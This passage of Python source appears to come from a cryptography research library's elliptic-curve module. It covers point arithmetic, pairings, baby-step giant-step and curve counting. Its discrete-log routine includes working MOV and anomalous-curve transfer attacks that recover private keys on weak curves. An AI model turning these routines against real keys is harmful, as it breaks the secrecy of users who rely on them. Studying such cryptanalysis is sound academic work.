y=Y_, z=Z_, curve=self.curve)\n\n\n def add_no_cache(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n # https://en.wikibooks.org/wiki/Cryptography/Prime_Curve/Standard_Projective_Coordinates\n if self.curve.POINT_AT_INFINITY == P2:\n return self\n\n elif self.curve.POINT_AT_INFINITY == self:\n return P2\n\n X1, Y1, Z1 = self._x, self._y, self._z\n X2, Y2, Z2 = P2._x, P2._y, P2._z\n A = self.curve.a\n\n U1 = Y2*Z1\n U2 = Y1*Z2\n V1 = X2*Z1\n V2 = X1*Z2\n\n if V1 == V2:\n if U1 == U2:\n return self.__double()\n else:\n return self.curve.POINT_AT_INFINITY\n\n U = U1 - U2\n V = V1 - V2\n W = Z1*Z2\n VS = V*V\n VT = VS*V\n VS2 = VS*V2\n A = (U*U)*W - VT - VS2*2\n X3 = V*A\n Y3 = U*(VS2 - A) - VT*U2\n Z3 = VT*W\n\n return WeierstrassPoint(x=X3, y=Y3, z=Z3, curve=self.curve)\n\n\n def mul_no_cache(self, other: int) -> 'WeierstrassPoint':\n return super().__mul__(other)\n \n\n @RUNTIME.global_cache()\n def __add__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return self.add_no_cache(P2)\n\n\n def __radd__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return self.__add__(P2)\n\n\n def __sub__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return self + (-P2)\n\n\n def __rsub__(self, P2: 'WeierstrassPoint') -> 'WeierstrassPoint':\n return -self + P2\n\n\n def __mul__(self, other: int) -> 'WeierstrassPoint':\n result = self.mul_no_cache(other)\n result._collapse_coords()\n return result\n\n\n\n def __truediv__(self, other: 'WeierstrassPoint') -> 'WeierstrassPoint':\n if type(other) is int:\n return self*mod_inv(other, self.order())\n\n elif not other:\n raise ZeroDivisionError\n\n elif not self:\n return 0\n\n # Is it an anomalous curve? Do additive transfer\n elif not (self * self.ring.ring.characteristic()):\n phi = self.curve.additive_transfer_map()\n return int((phi(self) / phi(other))[0])\n\n else:\n E = self.ring\n P = E(other)\n ord_facs = factor(P.order())\n\n # Is it even economical?\n if RUNTIME.enable_MOV_attack and max(ord_facs).bit_length() > RUNTIME.index_calculus_supremacy and (E.is_supersingular() or E.embedding_degree() < 7):\n Q = self\n\n # Implementation detail: Elliptic curve operations faster than\n # poly mul/div, so only do index calculus on large groups\n large_facs = {p: e for p,e in ord_facs.items() if p.bit_length() > RUNTIME.index_calculus_supremacy}\n small_facs = ord_facs - large_facs\n large_facs = ord_facs - small_facs\n large_subgroup = product([p**e for p,e in large_facs.items()])\n small_subgroup = P.order() // large_subgroup\n\n\n res = pohlig_hellman(P * large_subgroup, Q * large_subgroup, factors=small_facs)\n\n if res * P == Q:\n return res\n\n\n # Confine points to the large subgroup\n Qp = Q * small_subgroup\n Pp = P * small_subgroup\n\n phi = Pp.multiplicative_transfer_map()\n W1 = phi(Pp)\n W2 = phi(Qp)\n\n return crt([(W2/W1, large_subgroup), (res, small_subgroup)])[0]\n\n return pohlig_hellman(P, self, factors=ord_facs)\n\n\n __floordiv__ = __truediv__\n\n\n def line(self, R: 'WeierstrassPoint', Q: 'WeierstrassPoint') -> 'RingElement':\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_point.py#L1270\n \"\"\"\n if not Q:\n raise ValueError(\"'Q' cannot be zero\")\n\n if not self or not R:\n if self == R:\n return self.ring.ring.one\n if R:\n return Q.x - R.x\n else:\n return Q.x - self.x\n\n elif self != R:\n if self.x == R.x:\n return Q.x - self.x\n else:\n l = (R.y - self.y) / (R.x - self.x)\n return Q.y - self.y - l * (Q.x - self.x)\n\n else:\n den = 
(2*self.y)\n\n if not den:\n return Q.x - self.x\n else:\n l = (3*self.x**2 + self.ring.a)/den\n return Q.y - self.y - l * (Q.x - self.x)\n\n\n\n def miller(self, Q: 'WeierstrassPoint', n: int) -> 'RingElement':\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_point.py#L1345\n \"\"\"\n if not Q:\n raise ValueError(\"'Q' cannot be zero\")\n\n if not n:\n raise ValueError(\"'n' cannot be zero\")\n\n # Handle negatives later\n is_neg = False\n\n if n < 0:\n n = abs(n)\n is_neg = True\n\n t = self.ring.ring.one\n V = self\n\n # Double and add\n for bit in [int(bit) for bit in bin(n)[3:]]:\n S = 2*V\n l = V.line(V, Q)\n v = S.line(-S, Q)\n t = (t**2)*(l/v)\n V = S\n\n if bit:\n S = V+self\n l = V.line(self, Q)\n v = S.line(-S, Q)\n t = t*(l/v)\n V = S\n\n\n if is_neg:\n v = V.line(-V, Q)\n t = ~(t*v)\n\n return t\n\n\n def weil_pairing(self, Q: 'WeierstrassPoint', n: int=None) -> 'RingElement':\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_point.py#L1520\n \"\"\"\n E = self.ring\n n = n or self.order()\n\n if not Q in E:\n raise ValueError(f\"Q: {Q} is not on {E}\")\n\n # Ensure P and Q are both in E[n]\n if n*self:\n raise ValueError(f\"self: {self} is not {n}-torsion\")\n\n if n*Q:\n raise ValueError(f\"Q: {Q} is not {n}-torsion\")\n\n one = E.ring.one\n\n if self == Q:\n return one\n\n if not self or not Q:\n return one\n\n try:\n res = self.miller(Q, n) / Q.miller(self, n)\n\n if n % 2:\n res = -res\n\n return res\n\n except ZeroDivisionError:\n return one\n\n\n\n def tate_pairing(self, Q: 'WeierstrassPoint', n: int=None, k :int=None) -> 'RingElement':\n n = n or self.order()\n k = k or self.ring.embedding_degree()\n p = self.ring.ring.characteristic()\n\n return self.miller(Q, n)**((p**k-1) // n)\n\n\n @RUNTIME.global_cache(4)\n def multiplicative_transfer_map(self) -> 'Map':\n \"\"\"\n Generates a map to `Fq*` such that if `Q` = `self`*`d`, then `phi(Q)` = `phi(self)`*`d`.\n\n Returns:\n Map: Map function.\n \n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.general import random_int\n >>> E = EllipticCurve.generate_curve_with_trace(10, 0)\n >>> E.embedding_degree()\n 2\n\n >>> g = E.G\n >>> d = random_int(E.G.order())\n >>> q = g*d\n >>> M = g.multiplicative_transfer_map()\n >>> M(q)/M(g) == d\n True\n\n \"\"\"\n from samson.math.algebra.fields.finite_field import FiniteField as GF\n E = self.curve\n F = E.ring\n\n k = E.embedding_degree()\n K = GF(F.characteristic(), k)\n E_ = WeierstrassCurve(K(E.a), K(E.b))\n Km = K.mul_group()\n\n P = E_(self)\n o = P.order()\n\n while True:\n R = E_.find_element_of_order(o)\n W2 = P.weil_pairing(R, o)\n\n if Km(W2).order() == o:\n def mul_trans(Q):\n return Km(E_(Q).weil_pairing(R, o))\n\n phi = Map(E, Km, mul_trans)\n phi.R = R\n return phi\n\n\n def __batch_invert_zs(self, points):\n zeroes = [idx for idx, point in enumerate(points) if not point._z]\n invs = batch_inv([point._z for point in points if point._z])\n zero = self._x.ring.zero\n\n total = 0\n for idx in zeroes:\n invs.insert(idx+total, zero)\n total += 1\n\n return invs\n\n\n @RUNTIME.global_cache(2)\n def _build_bsgs_table(self, g: 'WeierstrassPoint', end: int, start: int, r: int, n: int):\n search_range = end - start\n table = {}\n y_table = {}\n m = kth_root(search_range // n, 2)\n\n # If we have no congruence, we can apply the involution speedup\n if n == 1:\n # TODO: How to reduce baby steps with 
involution map?\n # bs_size = max(m // 2, 1)\n bs_size = m\n else:\n bs_size = m\n\n # Align `e` with congruence\n e = g * ((r-start) % n)\n G = g*n\n\n # Defer inversions until we can batch them\n points = []\n for i in range(bs_size):\n points.append(e)\n e = e.add_no_cache(G)\n\n invs = self.__batch_invert_zs(points)\n\n # Perform inversions then cache\n for i in range(bs_size):\n e = points[i]\n z = invs[i]\n if z:\n e._x, e._y, e._z = e._x*z, e._y*z, e._z*z\n table[e.x] = i\n y_table[e.x] = e.y\n\n return table, y_table, m\n\n\n\n def bsgs(self, g: 'WeierstrassPoint', end: int, start: int=0, congruence: tuple=None, e: 'WeierstrassPoint'=None) -> int:\n \"\"\"\n References:\n \"MIT class 18.783, lecture notes #8: Point counting\" (https://math.mit.edu/classes/18.783/2019/LectureNotes8.pdf)\n \"Computing Elliptic Curve Discrete Logarithms with Improved Baby-step Giant-step Algorithm\" (https://eprint.iacr.org/2015/605.pdf)\n \"\"\"\n h = self\n if congruence:\n r, n = congruence\n else:\n r, n = 0, 1\n\n # Our BSGS implementation fails for points of order 2 since the point at infinity and our `x`\n # are both zero\n if not g*2:\n d = int(h == g)\n if d >= end or d % n != r:\n raise SearchspaceExhaustedException(f'Discrete log found but does not match parameters: d = {d}')\n else:\n return d\n\n table, y_table, m = self._build_bsgs_table(g, end, start, r, n)\n\n mb = m.bit_length()\n o = g*start\n factor = -g * (m*n)\n z = h-o\n\n for b in range((m+mb-1) // mb):\n points = []\n for i in range(mb):\n points.append(z)\n z = z.add_no_cache(factor)\n\n invs = self.__batch_invert_zs(points)\n\n for i, (e, inv) in enumerate(zip(points, invs)):\n x = e._x*inv\n if x in table:\n baby_idx = table[x]\n if y_table[x] != e._y*inv:\n baby_idx = -baby_idx\n\n return (m*(mb*b+i) + baby_idx)*n + start + ((r-start) % n)\n\n\n raise SearchspaceExhaustedException(\"This shouldn't happen; check your arguments\")\n\n\n\n @RUNTIME.global_cache()\n def embedding_degree(self) -> int:\n from samson.math.algebra.rings.integer_ring import ZZ\n\n Fo = self.ring.ring.order()\n Eo = self.order()\n\n Zem = (ZZ/ZZ(Eo)).mul_group()\n return Zem(Fo).order()\n\n\n\nclass PointAtInfinity(WeierstrassPoint):\n def __reprdir__(self):\n return ['curve']\n\n\n def __hash__(self):\n return object.__hash__(self)\n\n\n def __neg__(self) -> 'WeierstrassPoint':\n return self\n \n\n def order(self):\n return 1\n\n\n\nclass WeierstrassCurve(Ring):\n \"\"\"\n Elliptic curve of form y**2 = x**3 + a*x + b\n \"\"\"\n\n def __init__(self, a: RingElement, b: RingElement, ring: Ring=None, base_tuple: tuple=None, cardinality: int=None, check_singularity: bool=True, cm_discriminant: int=None, embedding_degree: int=None):\n \"\"\"\n Parameters:\n a (RingElement): `a` coefficient.\n b (RingElement): `b` constant.\n ring (Ring): Underlying ring.\n base_tuple (tuple): Tuple representing the base point 'G'.\n cardinality (int): Number of points on the curve.\n check_singularity (bool): Check if the curve is singular (no cusps or self-intersections).\n \"\"\"\n from samson.math.symbols import Symbol\n\n if not ring:\n if not hasattr(a, 'ring'):\n ring = b.ring\n\n elif not hasattr(b, 'ring'):\n ring = a.ring\n\n else:\n if a.ring.is_superstructure_of(b.ring):\n ring = a.ring\n else:\n ring = b.ring\n\n\n self.ring = ring or a.ring\n self.a = self.ring(a)\n self.b = self.ring(b)\n\n\n if check_singularity:\n if (4 * a**3 + 27 * b**2) == self.ring.zero:\n raise ValueError(\"Elliptic curve can't be singular\")\n\n if base_tuple:\n base_tuple = 
WeierstrassPoint(*base_tuple, self)\n\n self.G_cache = base_tuple\n self.dpoly_cache = {}\n\n self.cardinality_cache = cardinality\n self.curve_poly_ring = self[Symbol('x'), Symbol('y')]\n\n self.zero = PointAtInfinity(self.ring.zero, self.ring.one, self, self.ring.zero)\n self.PAF_cache = self.zero\n self.__cm_discriminant_cache = cm_discriminant\n self.__embedding_degree = embedding_degree\n\n\n\n def __reprdir__(self):\n return ['a', 'b', 'cardinality_cache', 'ring']\n\n\n\n def shorthand(self) -> str:\n return f'WeierstrassCurve{{a={self.a}, b={self.b}}}'\n\n\n def __getitem__(self, args):\n from samson.math.algebra.rings.curve_polynomial_ring import CurvePolynomialRing\n if type(args) is tuple:\n return CurvePolynomialRing(self.ring[args[0]], self.a, self.b)\n else:\n return super().__getitem__(args)\n\n\n def coerce(self, x: 'RingElement', y: 'RingElement'=None, verify: bool=True) -> WeierstrassPoint:\n if issubclass(type(x), WeierstrassPoint):\n if x.curve == self:\n return x\n else:\n return self(x.x, x.y)\n\n if y is not None:\n x, y = self.ring(x), self.ring(y)\n if verify and y**2 != x**3 + self.a*x + self.b:\n raise CoercionException(f'Point ({x}, {y}) not on curve')\n\n return WeierstrassPoint(x, y, self)\n else:\n return self.recover_point_from_x(x)\n\n\n def __call__(self, x: 'RingElement', y: 'RingElement'=None, verify: bool=True) -> WeierstrassPoint:\n return self.coerce(x, y, verify)\n\n\n def __eq__(self, other: 'WeierstrassCurve') -> bool:\n return type(other) == type(self) and self.a == other.a and self.b == other.b and self.ring == other.ring\n\n\n def __hash__(self):\n return hash((self.a, self.b))\n\n\n def __deepcopy__(self, memo):\n result = WeierstrassCurve(a=self.a, b=self.b, ring=self.ring, base_tuple=(self.G.x, self.G.y), cardinality=self.cardinality_cache)\n memo[id(self)] = result\n return result\n\n\n @property\n def p(self) -> int:\n return self.ring.characteristic()\n \n\n def defining_polynomial(self) -> 'Polynomial':\n from samson.math.symbols import Symbol\n x = Symbol('x')\n _ = self.ring[x]\n return x**3 + self.a*x + self.b\n\n\n def characteristic_polynomial(self) -> 'Polynomial':\n from samson.math.symbols import Symbol\n from samson.math.algebra.rings.integer_ring import ZZ\n x = Symbol('x')\n _ = ZZ[x]\n return x**2 - self.trace()*x + self.p\n\n\n @staticmethod\n def random_curve(n: RingElement) -> 'WeierstrassCurve':\n R = n.ring\n ring = R/n\n\n while True:\n x = R.random(n)\n y = R.random(n)\n a = R.random(n)\n b = (y**2 - x**3 - (a * x))\n\n g = gcd(int(4 * a**3 + 27 * b**2), n)\n if g != n:\n break\n\n curve = WeierstrassCurve(a=a, b=b, ring=ring, base_tuple=(x, y))\n return curve, g\n\n\n def formal_group(self) -> 'EllipticCurveFormalGroup':\n from samson.math.algebra.curves.elliptic_curve_formal_group import EllipticCurveFormalGroup\n return EllipticCurveFormalGroup(self)\n\n\n def frobenius_endomorphism(self) -> Map:\n F = self.ring.frobenius_endomorphism()\n return Map(domain=self, codomain=self, map_func=lambda P: self(F(P.x), F(P.y)))\n\n\n def find_gen(self) -> WeierstrassPoint:\n return self.abelian_group_generators()[0]\n \n\n def a_invariants(self):\n z = self.ring.zero\n return z, z, z, self.a, self.b\n\n\n def b_invariants(self):\n a1, a2, a3, a4, a6 = self.a_invariants()\n\n a12 = a1**2\n a32 = a3**2\n a24 = a2*4\n a64 = a6*4\n return a12 + a24, a1*a3 + a4*2, a32 + a64, a12 * a6 + a24*a6 - a1*a3*a4 + a2*a32 - a4**2\n\n\n def c_invariants(self):\n b2, b4, b6, _b8 = self.b_invariants()\n return b2**2 - b4*24, -b2**3 + b2*b4*36 
- b6*216\n \n\n @RUNTIME.global_cache()\n def isomorphisms(self, other: 'WeierstrassCurve') -> list:\n \"\"\"\n References:\n https://github.com/sagemath/sage/blob/develop/src/sage/schemes/elliptic_curves/ell_generic.py#L2283\n \"\"\"\n from samson.math.symbols import Symbol\n from samson.math.algebra.curves.elliptic_curve_isomorphism import EllipticCurveIsomorphism\n\n E, F = self, other\n j = E.j_invariant()\n R = E.ring\n\n if j != other.j_invariant():\n raise NoSolutionException('Curves are not isomorphic')\n\n a1E, a2E, a3E, _a4E, _a6E = E.a_invariants()\n a1F, a2F, a3F, _a4F, _a6F = F.a_invariants()\n c4E, c6E = E.c_invariants()\n c4F, c6F = F.c_invariants()\n\n if not j:\n m, um = 6, c6E/c6F\n\n elif j == R(1728):\n m, um = 4, c4E/c4F\n\n else:\n m, um = 2, (c6E*c4F)/(c6F*c4E)\n\n x = Symbol('x')\n _P = R[x]\n us = list((x**m - um).roots())\n\n isos = []\n for u in us:\n s = (a1F*u - a1E)/2\n r = (a2F*u**2 + a1E*s + s**2 - a2E)/3\n t = (a3F*u**3 - a1E*r - a3E)/2\n isos.append(EllipticCurveIsomorphism(E, F, u, r, s, t))\n \n return isos\n\n\n\n @RUNTIME.global_cache()\n def cardinality(self, algorithm: EllipticCurveCardAlg=EllipticCurveCardAlg.AUTO, check_supersingular: bool=True) -> int:\n \"\"\"\n Calculates the cardinality (number of points) of the curve and caches the result.\n\n Parameters:\n algorithm (EllipticCurveCardAlg): Algorithm to use.\n check_supersingular (bool): Whether or not to check whether the curve is supersingular.\n\n Returns:\n int: Cardinality of the curve.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.algebra.rings.integer_ring import ZZ\n >>> from samson.math.general import find_prime\n >>> # Uses a hybrid of BSGS and Schoofs for medium size curves\n >>> R = ZZ/ZZ(find_prime(20))\n >>> E, _ = EllipticCurve.random_curve(R.quotient)\n >>> E.random()*E.cardinality() == E.zero\n True\n\n >>> # Includes checks for supersingular curves\n >>> E = EllipticCurve.generate_supersingular_over_ring(R)\n >>> E.is_supersingular()\n True\n\n >>> E.random()*E.order() == E.zero\n True\n\n >>> # Uses bruteforce for small curves\n >>> R = ZZ/ZZ(find_prime(10))\n >>> E, _ = EllipticCurve.random_curve(R.quotient)\n >>> E.random()*E.cardinality() == E.zero\n True\n\n \"\"\"\n if not self.cardinality_cache:\n q = self.ring.order()\n p = self.ring.characteristic()\n\n _ipp, pk, k = is_perfect_power(q)\n\n # Finite field extension\n if pk != q and not self.a.degree() and not self.b.degree():\n E = EllipticCurve(self.a[0], self.b[0])\n t = E.trace()\n s = [2, t]\n\n for n in range(1, k):\n sn1 = t*s[n] - p*s[n-1]\n s.append(sn1)\n\n self.cardinality_cache = p**k + 1 - s[-1]\n return self.cardinality_cache\n\n\n if check_supersingular and self.is_supersingular():\n if not is_prime(p):\n raise RuntimeError('Supersingular curve over ring with non-prime power order')\n\n self.cardinality_cache = (p+1)**k\n return self.cardinality_cache\n\n\n if algorithm == EllipticCurveCardAlg.AUTO:\n curve_size = p.bit_length()\n\n if curve_size < 11:\n algorithm = EllipticCurveCardAlg.BRUTE_FORCE\n elif curve_size <= 160:\n algorithm = EllipticCurveCardAlg.BSGS\n else:\n algorithm = EllipticCurveCardAlg.SCHOOFS\n\n\n if algorithm == EllipticCurveCardAlg.BRUTE_FORCE:\n if self.ring.characteristic() == self.ring.order():\n P = self.random()\n start, end = hasse_frobenius_trace_interval(p)\n\n PC = P.cache_mul(p.bit_length())\n\n while not all(PC*i for i in sieve_of_eratosthenes(end)):\n P = self.random()\n PC = 
P.cache_mul(p.bit_length())\n\n for i in range(start, end):\n if not PC*(p+i):\n return p+i\n\n\n else:\n points = []\n\n for i in range(g.order()):\n try:\n points.append(self(g*i))\n except NoSolutionException:\n pass\n\n order = len(set(points + [-point for point in points]))+1\n\n self.cardinality_cache = order\n\n\n elif algorithm == EllipticCurveCardAlg.BSGS:\n # This is pretty slick. The order is at minimum `p - 2*sqrt(p)`. For p > 43, `2 * (p - 2*sqrt(p))`\n # is always outside of the interval. This means if we find a point with an order\n # greater than or equal to `(p - 2*sqrt(p))`, that has to be the order of the curve.\n # Additionally, due to Lagrange's theorem, every element's order is a divisor of\n # the group's order. If we only search inside of the interval, and the element's\n # order is greater than the interval, then the discrete logarithm of the point\n # at infinity will be the curve's order\n start, end = hasse_frobenius_trace_interval(p)\n n, m = 1, 1\n largest_elem = self.zero\n\n if p.bit_length() > 64 and self.a:\n from samson.math.algebra.curves.sea import elkies_trace_mod_l\n parity = int(self.defining_polynomial().is_irreducible())\n\n # Here we attempt to balance the exponential time BSGS and poly time Schoof\n trace_mods = [t_mod for t_mod in [3, 5, 7, 11, 13][:round(math.log(p.bit_length(), 3.5))] if t_mod % n or n < 2]\n elkies_con = []\n \n for l in primes(3, p.bit_length() // 2):\n try:\n elkies_con.append(elkies_trace_mod_l(self, l))\n if l in trace_mods:\n trace_mods.remove(l)\n except NoSolutionException:\n pass\n\n\n # If we're going to 11, we might as well use 3^2, too\n if 11 in trace_mods:\n trace_mods[0] = 9\n\n if trace_mods or elkies_con:\n o_con = crt(elkies_con + [frobenius_trace_mod_l(self, t_mod) for t_mod in trace_mods])\n r = p+1-o_con[0] % o_con[1]\n order_congruence = (int(r), int(o_con[1]))\n else:\n order_congruence = (0, 1)\n\n\n order_congruence = crt([order_congruence, (parity, 2)])\n else:\n order_congruence = (0, 1)\n\n # Computes the order of the curve even in non-cyclic groups\n while n*m < (start + p):\n g = self.random()\n if g and not g*n:\n # If this is true, then `n` is the sqrt of the curve's prime.\n # It's possible this curve is actually sqrt(p)Z x sqrt(p)Z,\n # so we're looking for a linearly independent point\n if n == end // 2 - 1:\n g.order_cache = g.find_maximum_subgroup(n)\n j, k = g.linear_relation(largest_elem)\n if not j:\n m = lcm(m, k)\n\n continue\n\n\n g_ord = self.zero.bsgs(g, start=start + p, end=end + p, congruence=crt([(0, n), order_congruence]))\n n = lcm(g_ord, n)\n g.order_cache = g_ord\n\n if g_ord != n:\n g = g.merge(largest_elem)\n\n largest_elem = g\n\n\n order = n*m\n if not self.G_cache:\n self.G_cache = largest_elem\n\n self.cardinality_cache = order\n\n elif algorithm == EllipticCurveCardAlg.SCHOOFS:\n self.cardinality_cache = schoofs_algorithm(self)\n\n else:\n raise ValueError(f\"Unknown EllipticCurveCardAlg '{algorithm}'\")\n\n return self.cardinality_cache\n\n\n def j_invariant(self) -> 'RingElement':\n \"\"\"\n References:\n https://en.wikipedia.org/wiki/Supersingular_isogeny_key_exchange#Background\n \"\"\"\n R = self.ring\n a3 = R(self.a)**3\n return 1728*((4*a3)/(4*a3 + 27*R(self.b)**2))\n\n\n @RUNTIME.global_cache()\n def is_supersingular(self) -> bool:\n \"\"\"\n References:\n https://en.wikipedia.org/wiki/Supersingular_elliptic_curve#Definition\n \"Elliptic Curves: Number Theory and Cryptography, 4.37\" 
(https://people.cs.nctu.edu.tw/~rjchen/ECC2012S/Elliptic%20Curves%20Number%20Theory%20And%20Cryptography%202n.pdf)\n \"\"\"\n R = self.ring\n p = R.characteristic()\n j = self.j_invariant()\n\n if p % 3 == 2 and j == R(0):\n return True\n\n elif p % 4 == 3 and j == R(1728):\n return True\n\n elif self.cardinality_cache or p < 233:\n return not self.cardinality(check_supersingular=False) % (p+1)\n\n else:\n _, p, n = is_perfect_power(R.order())\n return is_prime(p) and not self.random()*(p+1)**n\n\n\n\n @RUNTIME.global_cache()\n def embedding_degree(self) -> int:\n if self.__embedding_degree is not None:\n return self.__embedding_degree\n else:\n from samson.math.algebra.rings.integer_ring import ZZ\n\n Fo = self.ring.order()\n Eo = self.order()\n\n Zem = (ZZ/ZZ(Eo)).mul_group()\n return Zem(Fo).order()\n\n\n\n def trace_of_frobenius(self) -> int:\n return self.ring.order() + 1 - self.cardinality()\n\n\n trace = trace_of_frobenius\n\n\n def order(self) -> int:\n return self.cardinality()\n\n\n def characteristic(self) -> int:\n return self.G.order()\n\n\n @property\n def G(self) -> WeierstrassPoint:\n if not self.G_cache:\n self.G_cache = self.find_gen()\n\n return self.G_cache\n\n\n @property\n def one(self):\n return self.G\n\n\n @property\n def POINT_AT_INFINITY(self) -> WeierstrassPoint:\n if not self.PAF_cache:\n self.PAF_cache = self.zero\n\n return self.PAF_cache\n\n\n @RUNTIME.global_cache()\n def cm_discriminant(self) -> int:\n \"\"\"\n References:\n https://safecurves.cr.yp.to/disc.html\n \"\"\"\n if self.__cm_discriminant_cache is not None:\n return self.__cm_discriminant_cache\n else:\n from samson.math.algebra.rings.integer_ring import ZZ\n t = self.trace()\n p = self.ring.characteristic()\n D = factor(t**2-4*p, user_stop_func=lambda n, _: ZZ(n).is_square()).square_free().recombine()\n\n if D % 4 != 1:\n D *= 4\n\n return D\n\n\n\n @staticmethod\n def from_j(j: RingElement) -> 'WeierstrassCurve':\n \"\"\"\n Generates a `WeierstrassCurve` with desired `j`-invariant.\n\n Parameters:\n j (RingElement): `j`-invariant of curve.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n \"\"\"\n R = j.ring\n if j == R.zero:\n a, b = R.zero, R.one\n\n elif j == R(1728):\n a, b = R.one, R.zero\n\n else:\n k = j-1728\n a, b = -3*j*k, -2*j*k**2\n\n return WeierstrassCurve(a, b)\n\n\n generate_curve_with_j = from_j\n\n\n def quadratic_twist(self, D: RingElement=None) -> 'WeierstrassCurve':\n \"\"\"\n Returns the quadratic twist by `D`.\n\n Parameters:\n D (RingElement): Twist parameter:\n\n Returns:\n WeierstrassCurve: The twist.\n \"\"\"\n R = self.ring\n p = R.characteristic()\n\n if D is None:\n while True:\n D = R.random()\n if not D.is_square():\n break\n else:\n if R(D).is_square():\n raise ValueError(f'Cannot compute quadratic twist. 
{D} is square')\n\n\n b4, b6 = 2*self.a, 4*self.b\n twist = WeierstrassCurve(8*b4*D**2, 16*b6*D**3)\n\n if self.cardinality_cache:\n twist.cardinality_cache = 2*p+2-self.order()\n\n return twist\n\n\n def isogeny(self, P: WeierstrassPoint) -> 'EllipticCurveIsogeny':\n \"\"\"\n Finds the an elliptic curve isogeny whose kernel is `P`.\n\n Parameters:\n P (WeierstrassPoint): Kernel of isogeny.\n\n Returns:\n EllipticCurveIsogeny: Isogeny with kernel of `P`.\n\n References:\n https://epub.jku.at/obvulihs/content/titleinfo/2581853/full.pdf\n \"\"\"\n EllipticCurveIsogeny = _elliptic_curve_isogeny.EllipticCurveIsogeny\n\n if P.ring != self:\n raise ValueError(f'{P} is not on {self}')\n\n E = self\n n = P.order()\n n_facs = factor(n)\n phi = None\n\n for p, e in n_facs.items():\n Q = P*(n // p**e)\n\n for i in range(1, e+1):\n phi = EllipticCurveIsogeny(E, Q*(p**(e-i)), pre_isomorphism=phi)\n Q = phi._rat_map(Q)\n E = phi.codomain\n\n P = phi(P)\n\n return phi\n\n\n def _check_trace(self, trace: int) -> bool:\n return not bool(self.random()*(self.p+1-trace))\n\n\n\n @staticmethod\n def generate_curve_with_trace(bit_size: int, trace: int) -> 'WeierstrassCurve':\n \"\"\"\n Generates a `WeierstrassCurve` with field size `bit_size` and trace `trace`.\n\n Parameters:\n bit_size (int): Size of the underlying finite field in bits.\n trace (int): Trace curve should have.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> # Can generate curves with odd trace\n >>> EllipticCurve.generate_curve_with_trace(256, 1)._check_trace(1)\n True\n\n >>> # Can generate curves with negative odd trace\n >>> EllipticCurve.generate_curve_with_trace(256, -13)._check_trace(-13)\n True\n\n >>> # Can generate curves with even trace\n >>> EllipticCurve.generate_curve_with_trace(256, 2)._check_trace(2)\n True\n\n >>> # Can generate curves with negative even trace and multiples of 8\n >>> EllipticCurve.generate_curve_with_trace(256, -8)._check_trace(-8)\n True\n\n >>> # Can generate curves with zero trace\n >>> EllipticCurve.generate_curve_with_trace(256, 0)._check_trace(0)\n True\n\n >>> # Can generate curves with trace congruent to 5430965739045 % 10861931478090\n >>> EllipticCurve.generate_curve_with_trace(256, 5430965739045)._check_trace(5430965739045)\n True\n\n \"\"\"\n hasse_range = hasse_frobenius_trace_interval(2**bit_size)\n\n if trace not in range(*hasse_range):\n raise ValueError(f\"Trace {trace} not within Hasse bounds {hasse_range} for bit_size {bit_size}\")\n\n if trace % 2:\n if trace % 10861931478090 == 5430965739045 or trace % 4555003523070 == 2277501761535:\n return EllipticCurve._generate_curve_with_odd_trace_slow(bit_size, trace)\n else:\n return EllipticCurve._generate_curve_with_odd_trace_fast(bit_size, trace)\n elif not trace:\n return EllipticCurve._generate_supersingular_deg_1(bit_size)\n else:\n return EllipticCurve._generate_curve_with_even_trace(bit_size, trace)\n\n\n\n @staticmethod\n def _generate_supersingular_deg_1(bit_size: int=None, p:int=None) -> 'WeierstrassCurve':\n from samson.math.algebra.rings.integer_ring import ZZ\n from samson.math.prime_gen import PrimeEngine\n\n if not (bit_size or p):\n raise ValueError(\"Either 'bit_size' or 'p' must be specified\")\n\n p = p or PrimeEngine.GENS.RANDOM(bit_size).generate([lambda p: p % 4 == 3])\n\n R = ZZ/ZZ(p)\n a = R.random()\n\n while not a.is_square():\n a = R.random()\n\n E = EllipticCurve(a, R.zero)\n E.cardinality_cache = p + 1\n return 
E\n\n\n\n @staticmethod\n def generate_supersingular_over_ring(R: Ring) -> 'WeierstrassCurve':\n \"\"\"\n Generates a `WeierstrassCurve` over field `R`.\n\n Parameters:\n R (Ring): Base field.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n\n Examples:\n >>> from samson.math.algebra.curves.weierstrass_curve import EllipticCurve\n >>> from samson.math.algebra.rings.integer_ring import ZZ\n >>> R = ZZ/ZZ(find_prime(20))\n >>> E = EllipticCurve.generate_supersingular_over_ring(R)\n >>> E.is_supersingular()\n True\n\n \"\"\"\n from samson.math.algebra.rings.integer_ring import ZZ\n\n p = R.characteristic()\n Z = ZZ/ZZ(p)\n\n for i in range(3, 500):\n d = Z(i)\n\n if (p % 4 == 1) == d.is_square():\n continue\n\n D = -ZZ(d)\n\n if D % 4 != 1:\n D *= 4\n\n try:\n E = EllipticCurve.from_D(int(D), R, strict=False)\n if E.is_supersingular():\n return E\n\n except NoSolutionException:\n pass\n\n raise SearchspaceExhaustedException\n\n\n\n @staticmethod\n def from_D(D: int, R: Ring, strict: bool=True):\n \"\"\"\n Generates a `WeierstrassCurve` over field `R` with complex multiplication discriminant `D`.\n\n Parameters:\n D (int): Complex multiplication discriminant.\n R (Ring): Base field.\n\n Returns:\n WeierstrassCurve: Constructed curve.\n \"\"\"\n if strict:\n sols = _get_possible_traces_for_D(D, R.characteristic())\n\n order = 0\n Hd = hilbert_class_polynomial(-D)\n\n if Hd.degree() == 1:\n j_invs = [R(Hd.roots()[0])]\n else:\n j_invs = Hd.change_ring(R).roots()\n\n\n if j_invs:\n E = EllipticCurve.from_j(j_invs[0])\n\n if E.p.bit_length() > 8 and strict:\n P = E.random()\n\n def try_trace(t):\n if not P*(E.p + 1 - t):\n return E.p + 1 